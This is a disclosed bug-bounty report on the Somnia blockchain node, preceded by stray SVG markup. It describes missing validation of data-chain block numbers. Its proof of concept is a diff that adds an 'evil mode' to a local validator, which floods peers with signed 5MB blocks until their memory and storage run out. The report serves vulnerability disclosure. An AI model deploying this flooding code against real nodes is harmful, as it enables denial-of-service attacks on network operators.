'%3e%3cpath%20d='M12.4997%201.33325C10.39%201.33325%208.32772%201.95884%206.5736%203.13091C4.81947%204.30298%203.4523%205.96888%202.64496%207.91796C1.83763%209.86704%201.62639%2012.0118%202.03797%2014.0809C2.44955%2016.15%203.46545%2018.0506%204.95721%2019.5424C6.44897%2021.0342%208.34959%2022.0501%2010.4187%2022.4616C12.4878%2022.8732%2014.6326%2022.662%2016.5816%2021.8546C18.5307%2021.0473%2020.1966%2019.6801%2021.3687%2017.926C22.5408%2016.1719%2023.1663%2014.1096%2023.1663%2011.9999C23.1663%209.17094%2022.0425%206.45783%2020.0422%204.45745C18.0418%202.45706%2015.3287%201.33325%2012.4997%201.33325ZM12.4997%2021.3333C10.6537%2021.3333%208.84922%2020.7859%207.31436%2019.7603C5.7795%2018.7347%204.58322%2017.2771%203.8768%2015.5716C3.17039%2013.8662%202.98555%2011.9896%203.34568%2010.1791C3.70581%208.36859%204.59473%206.70554%205.90002%205.40025C7.20531%204.09496%208.86835%203.20605%2010.6788%202.84592C12.4893%202.48579%2014.3659%202.67063%2016.0714%203.37704C17.7768%204.08346%2019.2345%205.27974%2020.2601%206.8146C21.2856%208.34945%2021.833%2010.154%2021.833%2011.9999C21.833%2014.4753%2020.8497%2016.8492%2019.0993%2018.5996C17.349%2020.3499%2014.975%2021.3333%2012.4997%2021.3333Z'%20fill='white'/%3e%3cpath%20d='M19.167%208.06667C19.042%207.9425%2018.8731%207.8728%2018.697%207.8728C18.5208%207.8728%2018.3519%207.9425%2018.227%208.06667L10.8269%2015.4333L6.82695%2011.4333C6.70495%2011.3016%206.53562%2011.2237%206.35621%2011.2169C6.1768%2011.21%206.00201%2011.2747%205.87028%2011.3967C5.73856%2011.5187%205.66069%2011.688%205.65382%2011.8674C5.64694%2012.0468%205.71162%2012.2216%205.83362%2012.3533L10.8269%2017.3333L19.167%209.01333C19.2294%208.95136%2019.279%208.87762%2019.3129%208.79638C19.3467%208.71514%2019.3642%208.62801%2019.3642%208.54C19.3642%208.45199%2019.3467%208.36485%2019.3129%208.28361C19.279%208.20237%2019.2294%208.12864%2019.167%208.06667Z'%20fill='white'/%3e%3c/g%3e%3cdefs%3e%3cclipPath%20id='clip0_2790_31187'%3e%3crect%20width='24'%20height='24'%20fill='white'%20transform='translate(0.5)'/%3e%3c/clipPath%3e%3c/defs%3e%3c/svg%3e)
Somnia Disclosed Report
Audit report Somnia Audit Contest When a data chain block is received, there is no proper validation of the block number
Target
https://github.com/hackenproof-public/somnia
Vulnerability Details
When a datachain block is received, there is no upper limit for the block number. As shown in ReceivedBlock, the block is saved in storage after it is received, and then the header is saved in received_blocks:
https://github.com/hackenproof-public/somnia/blob/ea5c191a893153fe020aac35532bbcaca0f8c5d1/somnia/data_chains/data_chain.cc#L143-L157
This means that a malicious node could spam honest nodes with extremely large datachain blocks, which would be stored in storage and have their headers kept in memory, wasting the nodes’ resources and potentially even causing them to crash.
Because of this, I believe there should be a check to ensure that the block number does not exceed a maximum value. Otherwise, a malicious node could spam an endless number of blocks that would fill up storage and would also remain in the array, wasting memory. Additionally after an epoch finishes the invalid blocks should get removed.
Validation steps
Apply the following diff and run the network with NETWORK_PRESET=mainnet-small ./ci/run-local-deployment.sh. You can see in the comments what it does.
diff --git a/ci/run-local-deployment.sh b/ci/run-local-deployment.sh
index ab51ed8c..3001ab79 100755
--- a/ci/run-local-deployment.sh
+++ b/ci/run-local-deployment.sh
@@ -6,7 +6,7 @@ trap "trap - SIGTERM && kill -- -$$" SIGINT SIGTERM EXIT
cd "$(dirname "$0")/.."
# Set the number of validators.
-NUM_VALIDATORS=4
+NUM_VALIDATORS=2 # Only two validators are needed for this POC
NUM_GENERATED_TEST_ACCOUNTS=10000
NUM_GENERATED_TRANSACTIONS_PER_SECOND="100"
NETWORK_PRESET=${NETWORK_PRESET:-mainnet-small}
@@ -107,6 +107,11 @@ function runNode {
# Run a background process to add this node address as a validator.
addNodeAsValidator $validator_index ws://localhost:${base_api_websocket_port} &
+ local evil_param="" # Enable evil mode on validator 0. This means node 0 will spam node 1 with invalid data chain blocks.
+ if [ "$validator_index" -eq 0 ]; then
+ evil_param="--local-parameters.is-evil true"
+ fi
+
# Start the node.
echo "Starting validator $validator_index on ports $protocol_port and $data_port"
$SOMNIA_BIN node \
@@ -122,6 +127,7 @@ function runNode {
--local-parameters.seed-peer.peer-address $(cat /tmp/address_0.json) \
--local-parameters.seed-peer.hostname "127.0.0.1" \
--key-file /tmp/keys_${validator_index}.json \
+ $evil_param \
--parameters-preset "$NETWORK_PRESET" \
--verbose || true
diff --git a/somnia/data_chains/data_chain.cc b/somnia/data_chains/data_chain.cc
index 119454d2..8f5f7ce9 100644
--- a/somnia/data_chains/data_chain.cc
+++ b/somnia/data_chains/data_chain.cc
@@ -146,6 +146,9 @@ void DataChain::ReceivedBlock(BlockView input_block) {
// We already have this block.
return;
}
+ if (chain_parameters.local_parameters.is_evil && input_block.block_number > 3000) { // The malicious node should not attack itself
+ return;
+ }
// Save the block into the storage database.
storage_database.SetSmashData(
diff --git a/somnia/data_chains/data_chain_proposer.cc b/somnia/data_chains/data_chain_proposer.cc
index e0dfa588..81c2ad5a 100644
--- a/somnia/data_chains/data_chain_proposer.cc
+++ b/somnia/data_chains/data_chain_proposer.cc
@@ -349,6 +349,33 @@ void DataChainProposer::PublishNewBlock(DataChainCompressor::CompressedBlock com
new_block.total_resources_committed =
total_resources_published + new_block.data_chain_block_resources;
+ if(chain_parameters.local_parameters.is_evil) { //this creates blocks with the size of about 5MB and sends them 10 times to each node
+ for (int i = 0; i < 10; i++) { //creates a block with the data created above
+ constexpr size_t size = 5 * 1024 * 1024;
+ std::vector<std::uint8_t> data(size, 0xFF); // Initialize with 0xFF
+ spam_data = ByteSpanConst{data.data(), data.size()};
+
+ DataChain::BlockView spam_block;
+ spam_block.block_number = next_block_num;
+ spam_block.data = std::move(spam_data);
+ spam_block.data_chain_id = data_chain_id;
+ spam_block.parent_hash = ZeroHash();
+
+ spam_block.block_hash = spam_block.CalculateHash();
+ spam_block.signature = ecdsa::CreateSignature(spam_block.block_hash, our_private_keys.GetECDSAPrivateKey());
+
+ ByteSpanConst serialised_spam_block = smash::SerialiseToBuffer(spam_block);
+ std::vector<std::uint8_t> spam_to_broadcast = smash::SerialiseToVector(serialised_spam_block);
+
+ spdlog::info("sending block for number: {}", next_block_num);
+ for (const auto& peer : protocol_outgoing_router.GetAllConnectedPeers()) {
+ data_network.TrySendToPeer(peer, spam_to_broadcast);
+ }
+ data_network.FlushMessages();
+ next_block_num--; //block numbers starts at 30000 and become lower
+ }
+ }
+
// Calculate the block hash.
new_block.block_hash = new_block.CalculateHash();
diff --git a/somnia/data_chains/data_chain_proposer.h b/somnia/data_chains/data_chain_proposer.h
index 05a2d4cc..b9c2d962 100644
--- a/somnia/data_chains/data_chain_proposer.h
+++ b/somnia/data_chains/data_chain_proposer.h
@@ -15,6 +15,9 @@ namespace somnia {
// This class is responsible for creating new data chains, and proposing new blocks to go onto those
// data chains. There is currently one of these ran on each validator node.
struct DataChainProposer {
+ std::uint64_t next_block_num = 30000;
+ ByteSpanConst spam_data;
+
DataChainProposer(ChainParameters chain_parameters, StorageDatabase& storage_database,
ProtocolOutgoingRouter& protocol_outgoing_router,
PeerNetworkTransport& data_network,
diff --git a/somnia/parameters/local_parameters.h b/somnia/parameters/local_parameters.h
index d2d2b652..90b21ede 100644
--- a/somnia/parameters/local_parameters.h
+++ b/somnia/parameters/local_parameters.h
@@ -483,6 +483,10 @@ struct LocalParameters {
"transactions from.")
std::vector<Address> blocked_senders;
+ HELP(
+ "If node should have evil mode enabled")
+ bool is_evil = false;
+
ThrottlerParameters throttler_parameters;
api::APIParameters api_parameters;
After this you can run the following command in an extra terminal to monitor the memory usage and see that the memory usage of node 1 is much higher than the one from node 0. Additionally the storage is filled up. For me my either my whole vm or the node crashes after some time.
watch -n 0.1 '
echo "=== MEMORY ==="
ps -eo pid,cmd,%mem,rss,vsz --sort=-%mem ww | grep somnia
'
Attachments
hidden 
Comments on this report are hidden 
Details 
Participants (3) 
